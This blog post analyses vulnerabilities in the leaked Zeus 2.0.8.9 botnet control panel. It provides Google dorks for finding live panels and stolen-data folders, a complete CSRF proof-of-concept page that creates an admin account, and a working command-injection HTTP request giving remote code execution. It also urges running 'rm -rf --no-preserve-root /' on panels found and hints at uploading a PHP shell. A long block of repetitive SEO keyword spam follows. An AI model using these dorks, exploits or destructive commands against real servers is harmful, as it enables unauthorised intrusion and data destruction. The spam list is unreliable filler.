I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)
The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.
First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
- inurl:cp.php?m=login - this should be the login to the control panel
- inurl:_reports/files - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
- inurl:install/index.php - this should be deleted, but I think this is useless now.
Boring vulns found
- Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
- No password policy - admins can set up really weak passwords
- No anti brute-force - you can try to guess the admin's password. Default username is admin
- Password autocomplete enabled - boring
- Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
- No CSRF protection - except on the password change, where the old password is needed :-( boring
<html> <head> <title></title> </head> <body> <pre> This is a CSRF POC to create a new admin user in Zeus admin panels. Username: user_1392719246 Password: admin1 You might change the URL from 127.0.0.1. Redirecting in a hidden iframe in <span id="countdown">10</span> seconds. </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe> <form action="http://127.0.0.1/cp.php?m=sys_users&new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame"> <input name="name" type="hidden" value="user_1392719246" /> <input name="password" type="hidden" value="admin1" /> <input name="status" type="hidden" value="1" /> <input name="comment" type="hidden" value="PWND!" /> <input name="r_botnet_bots" type="hidden" value="1" /> <input name="r_botnet_scripts" type="hidden" value="1" /> <input name="r_botnet_scripts_edit" type="hidden" value="1" /> <input name="r_edit_bots" type="hidden" value="1" /> <input name="r_reports_db" type="hidden" value="1" /> <input name="r_reports_db_edit" type="hidden" value="1" /> <input name="r_reports_files" type="hidden" value="1" /> <input name="r_reports_files_edit" type="hidden" value="1" /> <input name="r_reports_jn" type="hidden" value="1" /> <input name="r_stats_main" type="hidden" value="1" /> <input name="r_stats_main_reset" type="hidden" value="1" /> <input name="r_stats_os" type="hidden" value="1" /> <input name="r_system_info" type="hidden" value="1" /> <input name="r_system_options" type="hidden" value="1" /> <input name="r_system_user" type="hidden" value="1" /> <input name="r_system_users" type="hidden" value="1" /> </form> <script type="text/javascript"> window.onload=function(){ var counter = 10; var interval = setInterval(function() { counter--; document.getElementById('countdown').innerHTML = counter; if (counter == 0) { redirect(); clearInterval(interval); } }, 1000); }; function redirect() { document.getElementById("csrf-form").submit(); } </script> </body> </html> - MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
- ClickJacking - really boring stuff
- Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
- SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.
Whats good news (for the C&C panel owners)
The following stuff looks good, at least some vulns were taken seriously:
- The system directory is protected with .htaccess deny from all.
- gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
- Anti XSS: the following code is used almost everywhere
return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8'); My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda. What's really bad news (for the C&C panel owners)
And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).
The vulnerable code is in system/fsarc.php:
function fsarcCreate($archive, $files){ ... $archive .= '.zip'; $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"'; exec($cli, $e, $r); } The exploit could not be simpler:
POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60 filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.
Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)
That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )
Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)
Related word
- Nsa Hack Tools Download
- Easy Hack Tools
- Hacking Apps
- Pentest Tools Online
- Hacking Tools Hardware
- Pentest Tools
- How To Make Hacking Tools
- How To Make Hacking Tools
- Tools Used For Hacking
- Hack Tools Pc
- How To Hack
- Pentest Tools
- Hack App
- Hacking Tools For Windows 7
- Hacking Tools
- Hacker Tools Linux
- Hacking Tools Free Download
- Pentest Tools Github
- Pentest Tools For Mac
- Ethical Hacker Tools
- Pentest Tools Tcp Port Scanner
- Hack Tools For Mac
- How To Make Hacking Tools
- Pentest Tools Free
- Hacker Tools Apk Download
- Hacking Tools Windows
- World No 1 Hacker Software
- Pentest Tools Nmap
- Free Pentest Tools For Windows
- New Hacker Tools
- Wifi Hacker Tools For Windows
- Pentest Tools Open Source
- World No 1 Hacker Software
- Hacker Tools
- Hacks And Tools
- Pentest Tools
- Hack Rom Tools
- Hack Apps
- Pentest Tools
- Pentest Tools Nmap
- Github Hacking Tools
- Growth Hacker Tools
- Hackers Toolbox
- Hacking Tools For Beginners
- Hack Tools For Windows
- Hacker Tools Hardware
- Top Pentest Tools
- Hacking Tools Usb
- Free Pentest Tools For Windows
- Hacker Tools Software
- Blackhat Hacker Tools
- Pentest Tools Apk
- Hack Tools Pc
- New Hacker Tools
- Hacker Tools Github
- Hacks And Tools
- Growth Hacker Tools
- Pentest Tools Website
- Usb Pentest Tools
- Hack Tool Apk
- Hacking Tools Software
- Pentest Tools For Windows
- Hacking App
- Pentest Tools Windows
- Hacking Tools Mac
- What Are Hacking Tools
- Nsa Hack Tools
- Hacking Tools For Windows 7
- Hacker Tools 2019
- Hacker Tools Windows
- Tools Used For Hacking
- Hacking Tools For Kali Linux
- New Hacker Tools
- Hacking Tools Windows 10
- Hack And Tools
- Hacker Tools For Mac
- Pentest Box Tools Download
- Install Pentest Tools Ubuntu
- Pentest Tools Online
- Nsa Hack Tools
- Pentest Tools Find Subdomains
- Pentest Tools For Mac
- Best Hacking Tools 2020
- Hacker Tools Linux
- Pentest Recon Tools
- Hacking Tools Download
- Bluetooth Hacking Tools Kali
- Hak5 Tools
- Hack Tools Pc
- New Hack Tools
- Hacking Tools For Mac
- Hacking Tools Usb
- Nsa Hack Tools
- Hacker Tools For Pc
- Hacks And Tools
- Pentest Tools Website Vulnerability
- Pentest Tools For Mac
- Best Hacking Tools 2020
- Pentest Tools Tcp Port Scanner
- Hack Apps
- Hackers Toolbox
- Hack Tools For Windows
- Hacking Tools For Pc
- Pentest Tools Framework
- Install Pentest Tools Ubuntu
- Pentest Tools Alternative
- Hacking Tools For Games
- Hacking Tools 2019
- Tools For Hacker
- Hacker Tools 2019
- Hacking Tools Name
- Hacking Tools Usb
- Hacking Tools For Pc
- Pentest Recon Tools
- Hack Tools For Windows
- Hack Tools For Ubuntu
- Hacking Tools For Mac
- Pentest Tools Find Subdomains
- Hacker Tools Linux
- Hacking Tools And Software
- Pentest Tools Find Subdomains
- Pentest Tools Tcp Port Scanner
- Hacker Tools For Mac
- New Hack Tools
- Game Hacking
- How To Hack
- Pentest Tools Online
- Pentest Tools Tcp Port Scanner
- Nsa Hack Tools
- Pentest Tools Tcp Port Scanner
- Hacking Tools For Windows
- Top Pentest Tools
- Hacks And Tools
- Hacker Tools Free Download
- Pentest Tools Port Scanner
- Hacker Tools Online
- Hacker Search Tools
- Pentest Tools Review
- Hacking Tools Hardware
- Hacker Tools Apk
- Hacking Tools Windows 10
- Hack App
- Pentest Tools Nmap
- Pentest Tools Open Source
- Hack Tools Download
- Hacker Hardware Tools
- Hack Apps
- Nsa Hack Tools
- Hacking Tools Github
- Hacker Tools List
- Hacking Tools For Mac
- Hacker Tools Free
- Hacking Tools For Kali Linux
- Wifi Hacker Tools For Windows
- Pentest Tools Url Fuzzer
- Underground Hacker Sites
- Hack Rom Tools
- Hacking Tools Name
- Hack Tools For Mac
- Easy Hack Tools
- Pentest Tools Apk
- Hacking Tools Github
- Pentest Tools Download
- Hacking Tools Usb
- Free Pentest Tools For Windows
- Hack Tools For Mac
- Hack Tools For Pc
- Pentest Tools For Mac
- Hacking Tools Pc
- World No 1 Hacker Software
- Pentest Tools Nmap
- Hacking Tools 2020
No comments:
Post a Comment